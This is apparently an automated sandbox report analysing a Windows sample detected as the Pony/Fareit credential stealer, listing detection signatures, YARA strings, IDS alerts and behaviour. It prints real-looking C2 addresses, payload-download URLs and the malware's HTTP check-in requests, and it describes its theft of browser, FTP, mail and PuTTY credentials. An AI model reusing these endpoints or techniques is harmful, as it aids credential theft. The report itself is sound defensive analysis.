Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
a5gvJhukP7.exe

Overview

General Information

Sample name:a5gvJhukP7.exe
renamed because original name is a hash value
Original sample name:18579d8151a242cf2e9b69b016479481.exe
Analysis ID:1528458
MD5:18579d8151a242cf2e9b69b016479481
SHA1:051bd937961bad91c2a3074eb39c001e591758d6
SHA256:2371d8edbb2a1245b01cc06a870ddca49acb3be47b25e0fddc5d1b0032780bdf
Tags:exePonyuser-abuse_ch
Infos:

Detection

Pony
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Pony
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Injects a PE file into a foreign processes
Machine Learning detection for sample
PE file has a writeable .text section
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Yara detected aPLib compressed binary
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (RtlQueryProcessDebugInformation/HeapInformation)
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Sample file is different than original file name gathered from version info
Sigma detected: Communication To Uncommon Destination Ports
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • a5gvJhukP7.exe (PID: 6436 cmdline: "C:\Users\user\Desktop\a5gvJhukP7.exe" MD5: 18579D8151A242CF2E9B69B016479481)
    • a5gvJhukP7.exe (PID: 6608 cmdline: "C:\Users\user\Desktop\a5gvJhukP7.exe" MD5: 18579D8151A242CF2E9B69B016479481)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
EvilPony, PonyshePrivately modded version of the Pony stealer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.evilpony
{"C2 list": ["http://209.59.219.70/forum/viewtopic.php", "http://67.215.225.205:8080/forum/viewtopic.php", "http://tokulances.sitebr.net/jV1.exe", "http://ftp.approachit.com/jZy.exe", "http://atualizacoes.issqn.net/FhPD.exe"]}
SourceRuleDescriptionAuthorStrings
00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
    00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpJoeSecurity_PonyYara detected PonyJoe Security
      00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpWindows_Trojan_Pony_d5516fe8unknownunknown
      • 0x1484f:$a1: \Global Downloader
      • 0x1400a:$a2: wiseftpsrvs.bin
      • 0x146af:$a3: SiteServer %d\SFTP
      • 0x146a3:$a4: %s\Keychain
      • 0x1490d:$a5: Connections.txt
      • 0x14c54:$a6: ftpshell.fsi
      • 0x153af:$a7: inetcomm server passwords
      00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmpponyIdentify PonyBrian Wallace @botnet_hunter
      • 0x1320c:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x153f6:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
      • 0x12a2e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
      • 0x1304f:$s3: POST %s HTTP/1.0
      • 0x13078:$s4: Accept-Encoding: identity, *;q=0
      • 0x13185:$s4: Accept-Encoding: identity, *;q=0
      00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        Click to see the 15 entries
        SourceRuleDescriptionAuthorStrings
        0.3.a5gvJhukP7.exe.bab604.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
          0.2.a5gvJhukP7.exe.ba0000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
            0.2.a5gvJhukP7.exe.ba0000.0.unpackJoeSecurity_PonyYara detected PonyJoe Security
              0.2.a5gvJhukP7.exe.ba0000.0.unpackWindows_Trojan_Pony_d5516fe8unknownunknown
              • 0x1d04f:$a1: \Global Downloader
              • 0x1c80a:$a2: wiseftpsrvs.bin
              • 0x1ceaf:$a3: SiteServer %d\SFTP
              • 0x1cea3:$a4: %s\Keychain
              • 0x1d10d:$a5: Connections.txt
              • 0x1d454:$a6: ftpshell.fsi
              • 0x1dbaf:$a7: inetcomm server passwords
              0.2.a5gvJhukP7.exe.ba0000.0.unpackponyIdentify PonyBrian Wallace @botnet_hunter
              • 0x1ba0c:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
              • 0x1dbf6:$s1: {%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
              • 0x1b22e:$s2: YUIPWDFILE0YUIPKDFILE0YUICRYPTED0YUI1.0
              • 0x1b84f:$s3: POST %s HTTP/1.0
              • 0x1b878:$s4: Accept-Encoding: identity, *;q=0
              • 0x1b985:$s4: Accept-Encoding: identity, *;q=0
              Click to see the 17 entries

              System Summary

              barindex
              Source: Network ConnectionAuthor: Florian Roth (Nextron Systems): Data: DestinationIp: 67.215.225.205, DestinationIsIpv6: false, DestinationPort: 8080, EventID: 3, Image: C:\Users\user\Desktop\a5gvJhukP7.exe, Initiated: true, ProcessId: 6608, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49730
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T23:12:03.976557+020020144111Malware Command and Control Activity Detected192.168.2.44973067.215.225.2058080TCP
              2024-10-07T23:12:30.334014+020020144111Malware Command and Control Activity Detected192.168.2.44973767.215.225.2058080TCP
              2024-10-07T23:12:56.692133+020020144111Malware Command and Control Activity Detected192.168.2.44973967.215.225.2058080TCP
              2024-10-07T23:13:23.053386+020020144111Malware Command and Control Activity Detected192.168.2.44988767.215.225.2058080TCP
              2024-10-07T23:13:49.411372+020020144111Malware Command and Control Activity Detected192.168.2.45000767.215.225.2058080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T23:12:03.976557+020020145621A Network Trojan was detected192.168.2.44973067.215.225.2058080TCP
              2024-10-07T23:12:30.334014+020020145621A Network Trojan was detected192.168.2.44973767.215.225.2058080TCP
              2024-10-07T23:12:56.692133+020020145621A Network Trojan was detected192.168.2.44973967.215.225.2058080TCP
              2024-10-07T23:13:23.053386+020020145621A Network Trojan was detected192.168.2.44988767.215.225.2058080TCP
              2024-10-07T23:13:49.411372+020020145621A Network Trojan was detected192.168.2.45000767.215.225.2058080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T23:12:03.965899+020020139341Malware Command and Control Activity Detected192.168.2.45000767.215.225.2058080TCP
              2024-10-07T23:12:25.309473+020020139341Malware Command and Control Activity Detected192.168.2.44973067.215.225.2058080TCP
              2024-10-07T23:12:51.671352+020020139341Malware Command and Control Activity Detected192.168.2.44973767.215.225.2058080TCP
              2024-10-07T23:13:18.030156+020020139341Malware Command and Control Activity Detected192.168.2.44973967.215.225.2058080TCP
              2024-10-07T23:13:44.389211+020020139341Malware Command and Control Activity Detected192.168.2.44988767.215.225.2058080TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-07T23:12:03.976557+020020165501Malware Command and Control Activity Detected192.168.2.44973067.215.225.2058080TCP
              2024-10-07T23:12:30.334014+020020165501Malware Command and Control Activity Detected192.168.2.44973767.215.225.2058080TCP
              2024-10-07T23:12:56.692133+020020165501Malware Command and Control Activity Detected192.168.2.44973967.215.225.2058080TCP
              2024-10-07T23:13:23.053386+020020165501Malware Command and Control Activity Detected192.168.2.44988767.215.225.2058080TCP
              2024-10-07T23:13:49.411372+020020165501Malware Command and Control Activity Detected192.168.2.45000767.215.225.2058080TCP

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: a5gvJhukP7.exeAvira: detected
              Source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpackMalware Configuration Extractor: Pony {"C2 list": ["http://209.59.219.70/forum/viewtopic.php", "http://67.215.225.205:8080/forum/viewtopic.php", "http://tokulances.sitebr.net/jV1.exe", "http://ftp.approachit.com/jZy.exe", "http://atualizacoes.issqn.net/FhPD.exe"]}
              Source: a5gvJhukP7.exeReversingLabs: Detection: 89%
              Source: Yara matchFile source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: a5gvJhukP7.exeJoe Sandbox ML: detected
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040A54C lstrlenW,wsprintfA,wsprintfA,lstrlenW,CryptUnprotectData,LocalFree,1_2_0040A54C
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040D1E9 CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmpA,lstrcmpA,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,1_2_0040D1E9
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040CC68 lstrlenA,CryptUnprotectData,LocalFree,1_2_0040CC68
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040A94F lstrlenA,CryptUnprotectData,LocalFree,1_2_0040A94F
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040BA61 CryptUnprotectData,LocalFree,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,lstrlenA,StrCmpNIA,1_2_0040BA61
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040421D CryptUnprotectData,LocalFree,1_2_0040421D
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040A391 WideCharToMultiByte,lstrcmpiA,lstrcmpiA,lstrcmpiA,StrStrIA,CryptUnprotectData,LocalFree,CoTaskMemFree,1_2_0040A391
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040A798 CredEnumerateA,lstrlenW,CryptUnprotectData,LocalFree,CredFree,1_2_0040A798
              Source: a5gvJhukP7.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: a5gvJhukP7.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00405024 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,1_2_00405024
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00404CB4 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_2_00404CB4
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040891F FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_0040891F
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00403FE7 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_00403FE7
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040966C FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlenA,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_2_0040966C
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_0040879B FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_0040879B
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior

              Networking

              barindex
              Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49730 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49730 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49737 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49730 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49730 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49739 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49737 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49737 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49737 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49739 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49739 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49739 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:49887 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:49887 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:49887 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:49887 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2014411 - Severity 1 - ET MALWARE Fareit/Pony Downloader Checkin 2 : 192.168.2.4:50007 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2014562 - Severity 1 - ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98 : 192.168.2.4:50007 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2016550 - Severity 1 - ET MALWARE Win32/Fareit Checkin 2 : 192.168.2.4:50007 -> 67.215.225.205:8080
              Source: Network trafficSuricata IDS: 2013934 - Severity 1 - ET MALWARE Win32.Fareit.A/Pony Downloader Checkin : 192.168.2.4:50007 -> 67.215.225.205:8080
              Source: Malware configuration extractorURLs: http://209.59.219.70/forum/viewtopic.php
              Source: Malware configuration extractorURLs: http://67.215.225.205:8080/forum/viewtopic.php
              Source: Malware configuration extractorURLs: http://tokulances.sitebr.net/jV1.exe
              Source: Malware configuration extractorURLs: http://ftp.approachit.com/jZy.exe
              Source: Malware configuration extractorURLs: http://atualizacoes.issqn.net/FhPD.exe
              Source: global trafficTCP traffic: 192.168.2.4:49730 -> 67.215.225.205:8080
              Source: Joe Sandbox ViewASN Name: ASN-QUADRANET-GLOBALUS ASN-QUADRANET-GLOBALUS
              Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: */*Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
              Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: */*Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
              Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: */*Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
              Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: */*Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
              Source: global trafficHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: */*Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: unknownTCP traffic detected without corresponding DNS query: 67.215.225.205
              Source: C:\Users\user\Desktop\a5gvJhukP7.exeCode function: 1_2_00403771 recv,1_2_00403771
              Source: unknownHTTP traffic detected: POST /forum/viewtopic.php HTTP/1.0Host: 67.215.225.205Accept: */*Accept-Encoding: identity, *;q=0Content-Length: 177Connection: closeContent-Type: application/octet-streamContent-Encoding: binaryUser-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
              Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: ftp://http://https://ftp.fireFTPsites.datSeaMonkey
              Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://209.59.219.70/forum/viewtopic.php
              Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://67.215.225.205:8080/forum/viewtopic.php
              Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://67.215.225.205:8080/forum/viewtopic.phpcv
              Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://67.215.225.205:8080/forum/viewtopic.phphttp://209.59.219.70/forum/viewtopic.phphttp://ftp.app
              Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://atualizacoes.issqn.net/FhPD.exe
              Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://ftp.approachit.com/jZy.exe
              Source: a5gvJhukP7.exe, 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://https://ftp://operawand.dat_Software
              Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://tokulances.sitebr.net/jV1.exe
              Source: a5gvJhukP7.exe, a5gvJhukP7.exe, 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.ibsensoftware.com/
              Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
              Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
              Source: a5gvJhukP7.exe, 00000001.00000002.2897820699.0000000001198000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
              Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: a5gvJhukP7.exe, 00000001.00000003.1710545996.0000000001204000.00000004.00000020.00020000.00000000.sdmp, a5gvJhukP7.exe, 00000001.00000003.1710648038.0000000001204000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

              E-Banking Fraud

              barindex
              Source: Yara matchFile source: 0.2.a5gvJhukP7.exe.ba0000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.3.a5gvJhukP7.exe.bab604.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.a5gvJhukP7.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.a5gvJhukP7.exe.bab604.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.a5gvJhukP7.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000003.1704992752.0000000000BAB000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.2897597682.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1706428602.0000000000BA9000.00000004.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: a5gvJhukP7.exe PID: 6436, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: a5gvJhukP7.exe PID: 6608, type: MEMORYSTR

              System Summary

              barindex
